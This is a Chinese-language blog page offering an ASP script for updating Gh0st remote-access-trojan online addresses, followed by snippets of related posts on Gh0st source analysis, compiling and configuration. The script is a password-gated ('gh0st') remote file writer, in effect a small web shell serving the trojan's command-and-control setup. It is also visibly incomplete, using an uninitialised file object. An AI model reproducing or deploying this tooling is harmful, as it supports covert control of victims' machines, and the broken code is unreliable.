Gh0st上線更新專用ASP檔案

2021-04-17 15:57:23 字數 439 閱讀 1628

<%

if request.form(」str」)<>」" and request.form(」file」) <> 「」 then

if request.form(」pass」) = 「gh0st」 then

set fso=server.createobject(」scripting.filesystemobject」)

zy.writeline request(」str」)

response.write 「更新成功…」

set zy=nothing

set fso=nothing

else

response.write 「密碼錯誤…」

end if

end if

%>

remote: <%=request.servervariables(」remote_addr」)%>

gh0st原始碼分析 gh0st 1

在gh0st classes中定義了一堆標頭檔案和他們的實現函式,先從inifile.h標頭檔案看起 定義了設定獲取檔名的函式,以及data的型別轉換函式和get函式 inifile.cpp 初始化檔案,設定檔名,型別為ini型別,並且設定格式的函式實現。gh0stdoc.h class cdocu...

gh0st遠控官方原始碼編譯步驟

所需工具 vc 6.0 platform sdk software development kit 軟體開發工具包 windows ddk device development kit 裝置開發工具包 gh0st官方原始碼是vc6.0編寫,而且還需要安裝software development ki...

gh0st中讀取配置檔案的方法

gh0st監聽的埠和服務端最大連線的數量是通過配置檔案進行讀取的。在gh0st.cpp檔案中,函式中,有如下 int nport m inifile.getint settings listenport int nmaxconnection m inifile.getint settings max...